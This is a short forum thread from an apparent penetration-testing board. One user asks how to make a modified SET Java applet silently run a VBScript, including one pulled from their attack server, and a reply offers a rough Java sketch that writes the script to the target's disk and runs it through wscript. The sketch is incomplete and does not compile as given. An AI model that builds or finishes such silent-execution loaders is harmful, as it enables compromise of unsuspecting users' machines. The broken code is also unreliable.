Results 1 to 2 of 2

Thread: Possible to insert vbs in java applet/ wscript invoke vbs from internet?

  1. #1
    Junior Member
    Join Date
    Feb 2006
    Posts
    25

    Default Possible to insert vbs in java applet/ wscript invoke vbs from internet?

    Hi,

    Maybe this is the wrong section, so I apologise in advance if so.
    Anyway, been playing with SET and other existing java applet attacks and have tried to modify the applet to silently execute a vbs instead of the windows binary (or metasploit payloads).
    I have recompiled the applet so that it runs wscript instead of CMD, but I can't seem to get wscript to invoke a vbs script residing on our attack server sitting on the internet. (I've tried wscript \\IP\path\test.vbs and variations thereof like http, etc instead of hardcoded IP). Perhaps this is due to wscript and cscript's inherent security limitations not allowing them to invoke scripts sitting on the internet?, so the next best thing would be for the vbs to be included in the applet itself so that it would reside locally like in %temp% and could then be silently executed by wscript.

    Anyway, been struggling to get this working and would appreciate any help, java source code or a nudge in the right direction.

    Thanks

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    8

    Default Re: Possible to insert vbs in java applet/ wscript invoke vbs from internet?

    What about transferring it over via a serialized object storing the script? That way the wscript program and the vbscript file are residing on the targets machine? Is such a thing possible?

    hmm, I wonder if the following would work:

    Code:
    public final class className implements Serializable{
    
    	public static FileOutputStream output;
    	public static PrintStream print;
    
    	public void CreateFile(){
    		try{
    			output = new OutputStream("<path to file>");
    			print = new PrintStream(output);
    
    			print.println("First line of vbscript");
    			.
    			.
    			.
    			print.println("Last line of vbscript");
    		}
    		catch (Exception e){
    			e.printStackTrace();
    		}
    	}
    
    	public void RunScript(){
    		try{
    			Process p = Runtime.getRuntime().exec("wscript <your file path>");
    	}
    
    	// Whatever else you need to add
    }
    You could probably even just copy and paste the contents of the vbscript file into the first println command and forego using a println over and over for each line. I've never worked with vbscript so I'm not sure what delimits a line, \n maybe? So if that's the case, I would think you'll need to add the \n at the end of each line in the vbscript and maybe just switch to print instead of println.

    I'm not a Java guru or anything. In fact, I essentially copied what dedaily.com had put down as an example for running system commands. I've just taken a single course in Java programming so I essentially know the basics. Not sure if this is what your looking for but hope it points you in the right direction.

Similar Threads

  1. Acceso a Windows 7 por Medio de SET (Java Applet Attack)
    By šĜrτĦacK in forum BT Videos - ES
    Replies: 0
    Last Post: 05-01-2010, 07:36 PM
  2. Java Applet with Meterpreter Payload
    By purehate in forum OLD Misc Tools
    Replies: 1
    Last Post: 01-22-2010, 10:27 PM
  3. Malicious Metasploit Applet (via BeEF)
    By purehate in forum OLD BT4 Videos
    Replies: 0
    Last Post: 10-01-2009, 01:27 PM
  4. Invoke ISP's DNS propagation????
    By imported_wyze in forum OLD General IT Discussion
    Replies: 1
    Last Post: 11-16-2007, 07:47 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •